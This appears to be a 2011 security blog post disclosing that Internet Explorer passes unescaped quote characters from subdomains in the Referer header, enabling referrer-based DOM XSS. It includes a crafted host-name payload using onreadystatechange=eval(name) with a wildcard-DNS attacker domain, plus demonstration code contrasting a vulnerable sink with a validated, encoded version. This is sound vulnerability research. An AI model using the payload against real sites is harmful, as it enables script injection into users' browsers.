Monday, March 28, 2011

Abusing Referrer on Explorer for Referrer based DOM Xss

I don't really know if this is actually known, but I thought it was worth writing.

In a few words:
While other browsers reject or encode certain characters in subdomain names, IE accepts them and sends them along in the Referer header. Hence it's possible to abuse that behavior to exploit referrer based DOM Xss.

Some more words about it:
I was doing some testing using DOMInator (a yet-to-be-released tool for finding DOM Based Xss) and I saw a JavaScript snippet doing the following:

// Sink (c is set by surrounding code not shown): the Referer host, referrer.split("/")[2], lands unescaped inside the src attribute
with(document)
  write('<sc'+"ript src=\"http://Host/image.gif?t="+c+"r="+(referrer.split("/")[2])+"\"></sc"+'ript>'); //updated to match host only referrer

Immediately some questions came to me: « Is it actually exploitable? Does any browser allow HTML special characters in a subdomain, like '">heyThere.mindedsecurity.com? »
After testing some browsers I saw that Internet Explorer does allow them.

So we set up a wildcard DNS zone which always returns the same IP no matter which subdomain is requested, so that any such host name resolves to our server.

That means an attacker can serve a page from a host such as
"onreadystatechange=eval(name).attacker.com (the wildcard zone resolves it) and have IE load the vulnerable page from there. IE sends that host name unescaped in the Referer header, so referrer.split("/")[2] returns it verbatim: the leading double quote closes the src attribute of the injected script tag, the rest of the host name becomes an onreadystatechange attribute on that element, and eval(name) runs whatever the attacker placed in window.name, for instance by opening the vulnerable page with a chosen window name. In this way IE's host behavior turns a
page vulnerable to DOM Based Cross Site Scripting via referrer into a working exploit.
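As an added illustration (this is not code from the original post or from DOMInator), the following JavaScript reproduces the sink shown above as a pure function, feeds it a constructed Referer carrying the payload discussed here, and puts a validating variant beside it. Host, the image.gif path and the two sample Referer values are placeholders; attributeNames is a rough tokenizer whose only job is to show which attributes an HTML parser would see on the generated script tag.

```javascript
// Added example, not code from the original post or from DOMInator.
// "Host", the tracker path and the sample Referer values below are
// placeholders / constructed inputs, not real endpoints.

var HOST = "Host";

// Splits a Referer the same way the original snippet does: scheme, "", host.
function referrerHost(referrer) {
  return (referrer || "").split("/")[2] || "";
}

// Vulnerable: the host is concatenated straight into a double-quoted src
// attribute, so a '"' inside it closes the attribute and whatever follows is
// parsed as further attributes of the <script> element.
function trackerMarkup(referrer, c) {
  return '<sc' + 'ript src="http://' + HOST + '/image.gif?t=' + c +
         'r=' + referrerHost(referrer) + '"></sc' + 'ript>';
}

// Hardened: only accept a host that is a syntactically valid hostname
// (labels of letters, digits and '-', joined by '.', optional :port), and
// percent-encode it anyway so no '"', '<' or '>' can reach the attribute.
var HOSTNAME_RE = /^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*(?::\d{1,5})?$/;

function safeReferrerHost(referrer) {
  var host = referrerHost(referrer);
  return HOSTNAME_RE.test(host) ? host : null;
}

function safeTrackerMarkup(referrer, c) {
  var host = safeReferrerHost(referrer);
  return '<sc' + 'ript src="http://' + HOST + '/image.gif?t=' +
         encodeURIComponent(String(c)) +
         '&r=' + (host === null ? "" : encodeURIComponent(host)) +
         '"></sc' + 'ript>';
}

// Rough attribute-name extraction for the opening <script ...> tag: enough to
// show which attributes an HTML parser would see (quoted or unquoted values).
function attributeNames(markup) {
  var open = markup.slice(markup.indexOf("<script") + 7, markup.indexOf(">"));
  var names = [];
  var re = /\s*([^\s=\/>"']+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]*))?/g;
  var m;
  while ((m = re.exec(open)) !== null) names.push(m[1]);
  return names;
}

// Constructed sample Referer values. The second one can only arrive from a
// browser that, like the IE of the post, sends such a host name unescaped;
// the wildcard DNS zone makes any such label resolve to the attacker's server.
var BENIGN_REFERER  = "http://www.example.com/some/page.html";
var HOSTILE_REFERER = 'http://"onreadystatechange=eval(name).attacker.com/';

// Side-by-side view of both builders on both inputs.
function compare(c) {
  return {
    vulnerable: { benign:  trackerMarkup(BENIGN_REFERER, c),
                  hostile: trackerMarkup(HOSTILE_REFERER, c) },
    hardened:   { benign:  safeTrackerMarkup(BENIGN_REFERER, c),
                  hostile: safeTrackerMarkup(HOSTILE_REFERER, c) }
  };
}

console.log(JSON.stringify(compare(1), null, 2));
```

Running it shows the vulnerable builder emitting a script tag with two attributes for the hostile Referer (src and onreadystatechange) while the hardened one emits only src with an empty r parameter; the validation step rejects the host before it is ever concatenated, and the encoding would stop the breakout even if the check were skipped.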

Nota Bene: At the moment the wildcard DNS is private. But we'll release
a basic service to test referrer based DOMXss. So, stay tuned for updates.